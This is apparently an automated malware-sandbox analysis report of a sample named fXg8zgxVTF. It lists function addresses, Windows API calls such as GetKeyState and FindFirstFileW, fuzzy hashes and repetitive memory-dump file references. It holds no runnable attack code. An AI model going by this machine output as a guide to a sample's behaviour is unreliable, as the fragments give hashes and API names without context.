Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugFindHeapPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 1904592477-0
Opcode ID: ae96d405f00704607cff5c150a38585ca48a0c22055b0bb24acc2011e66e41ab
Instruction ID: 526a99f63c772e3616387f226167748a4059ef8cb4a2a88002c65f7d307383be
Opcode Fuzzy Hash: ae96d405f00704607cff5c150a38585ca48a0c22055b0bb24acc2011e66e41ab
Instruction Fuzzy Hash: 8D41A1719442199BDF24ABA1CC89BEE7778AF00304F0042EAF819A2291DB794EC0CE19

Function 00414E54 Relevance: 13.6, APIs: 9, Instructions: 95keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000001), ref: 00414E74
GetKeyState.USER32(00000002), ref: 00414E87
GetTickCount.KERNEL32 ref: 00414E96
SetCapture.USER32(?), ref: 00414EA5
GetCapture.USER32 ref: 00414EC5
PeekMessageW.USER32(?,00000000,00000200,00000209,00000001), ref: 00414EEC
PeekMessageW.USER32(?,00000000,00000100,00000109,00000001), ref: 00414EFF
GetTickCount.KERNEL32 ref: 00414F44
ReleaseCapture.USER32 ref: 00414F66

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Capture$CountMessagePeekStateTick$Release
String ID:
API String ID: 2496516603-0
Opcode ID: d8aa63a523e91d57897b79ac716b0978c4e3174ee50928393d62c527d86575be
Instruction ID: 33999049cfdec4fae71ba54ba174e244dea1cced0a2a990c0f12ac2b5e4409fb
Opcode Fuzzy Hash: d8aa63a523e91d57897b79ac716b0978c4e3174ee50928393d62c527d86575be
Instruction Fuzzy Hash: 8631B4715003059FDB60EFA5C989BDB7BE8FB84744F50042AE146E26A1D7B8F982CF19

Function 00468FC0 Relevance: 10.7, APIs: 7, Instructions: 156memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00468530: _DebugHeapAllocator.LIBCPMTD ref: 0046853F

_DebugHeapAllocator.LIBCPMTD ref: 00469006

Part of subcall function 004036D0: _DebugHeapAllocator.LIBCPMTD ref: 00403708
Part of subcall function 004036D0: _DebugHeapAllocator.LIBCPMTD ref: 0040374B

FindFirstFileW.KERNEL32(00000000,?,?,87E7D08C), ref: 00469053
_DebugHeapAllocator.LIBCPMTD ref: 004690B2
_DebugHeapAllocator.LIBCPMTD ref: 004690F7
FindNextFileW.KERNEL32(000000FF,?), ref: 004691C3
FindClose.KERNEL32(000000FF), ref: 004691D8
GetLastError.KERNEL32(?), ref: 004691E4

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$Find$File$CloseErrorFirstLastNext
String ID:
API String ID: 179754126-0
Opcode ID: 39a1183bc6e1bd0a26b199fa9202101d8e651517bf4088a50da10ddd9fd78871
Instruction ID: 929e9badcb9d55ba7bde791147d812d4a18188db0643442573d1a74354b52612
Opcode Fuzzy Hash: 39a1183bc6e1bd0a26b199fa9202101d8e651517bf4088a50da10ddd9fd78871
Instruction Fuzzy Hash: 3E616C70905119DBDF14EF64CC88BEEB7B8AF04304F2085AEE01A67290EB785E84CF55

Function 00468D60 Relevance: 7.6, APIs: 5, Instructions: 144memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00468530: _DebugHeapAllocator.LIBCPMTD ref: 0046853F

_DebugHeapAllocator.LIBCPMTD ref: 00468DA6

Part of subcall function 00404790: _DebugHeapAllocator.LIBCPMTD ref: 004047C8
Part of subcall function 00404790: _DebugHeapAllocator.LIBCPMTD ref: 0040480A

FindFirstFileW.KERNEL32(00000000,?,?,87E7D08C), ref: 00468DF4
FindNextFileW.KERNEL32(000000FF,?), ref: 00468F2A
FindClose.KERNEL32(000000FF), ref: 00468F48
GetLastError.KERNEL32(?), ref: 00468F54

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$Find$File$CloseErrorFirstLastNext
String ID:
API String ID: 179754126-0
Opcode ID: 760c95445a7b5be2712f8da9c8d8aba50b9dbad93f91824623b822ba161d7d35
Instruction ID: 90b10077a7d38ad4eea2f52512e462ddaa668ea7aaf7da26a5a027a979a18b46
Opcode Fuzzy Hash: 760c95445a7b5be2712f8da9c8d8aba50b9dbad93f91824623b822ba161d7d35
Instruction Fuzzy Hash: 2C515F71905219DBCF14EFA4CC89BEEB7B4AB04304F10869EE11963291EB785F84CF95

Function 00468BA0 Relevance: 7.6, APIs: 5, Instructions: 110memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00468530: _DebugHeapAllocator.LIBCPMTD ref: 0046853F

_DebugHeapAllocator.LIBCPMTD ref: 00468BE6

Part of subcall function 00404790: _DebugHeapAllocator.LIBCPMTD ref: 004047C8
Part of subcall function 00404790: _DebugHeapAllocator.LIBCPMTD ref: 0040480A

FindFirstFileW.KERNEL32(00000000,?,?,87E7D08C), ref: 00468C34
FindNextFileW.KERNEL32(000000FF,?), ref: 00468CCE
FindClose.KERNEL32(000000FF), ref: 00468CEC
GetLastError.KERNEL32(0045842F), ref: 00468CF8

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$Find$File$CloseErrorFirstLastNext
String ID:
API String ID: 179754126-0
Opcode ID: beb71e566df6c1cc92921a098cb5143b1df6f782467be2e291711d1dd0e48291
Instruction ID: 1739448a077f953f19e8a74dcb47dcbd71483c3ecd6abd3f2862ae9ec6298d8c
Opcode Fuzzy Hash: beb71e566df6c1cc92921a098cb5143b1df6f782467be2e291711d1dd0e48291
Instruction Fuzzy Hash: F7416D71905218DBCF14EFA5DC89BEEB7B4BB44304F1046AEE51963290EB385E84CF65

Function 00410C6C Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004136CF: GetWindowLongW.USER32(?,000000F0), ref: 004136DA

GetKeyState.USER32(00000010), ref: 00410C92
GetKeyState.USER32(00000011), ref: 00410C9B
GetKeyState.USER32(00000012), ref: 00410CA4
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00410CBA

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: fb1ba99f82d89e8b2faee943a84d60b04deab64e7e1de331d23b444722e9613d
Instruction ID: f36f2dc18bb915c3f1a3c82188bdae1cec63d6e324fae310c7e9b590ccae6d5e
Opcode Fuzzy Hash: fb1ba99f82d89e8b2faee943a84d60b04deab64e7e1de331d23b444722e9613d
Instruction Fuzzy Hash: B1F0593934124A32EA1836728E01FE554145F60BD4F00053BB642EB2D1FDE8C8C24AF8

Function 0040E252 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
